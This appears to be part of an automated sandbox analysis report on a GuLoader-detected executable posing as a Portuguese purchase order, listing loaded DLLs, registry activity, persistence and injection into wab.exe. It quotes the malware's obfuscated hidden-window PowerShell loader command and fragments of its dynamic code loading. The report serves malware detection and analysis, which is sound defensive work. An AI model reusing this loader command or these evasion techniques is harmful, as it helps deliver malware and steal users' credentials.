              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: z14Novospedidosdecompra_Profil_4903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: stem.Core.pdb_K source: powershell.exe, 00000001.00000002.2404825141.0000000008A40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2393081207.0000000003286000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2404825141.0000000008A5F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000001.00000002.2405665204.0000000009F4C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Skydevinduers $Legerdemainist $adjurors), (Scarabaeidae @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Begins = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Abaisse)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kontorpersonalerne46, $false).DefineType($Bogkbet
              Obfuscated command line found
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07B0A119 push 8B060624h; iretd 1_2_07B0A11E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07B0A044 push 8B6B16D0h; iretd 1_2_07B0A049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exeJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
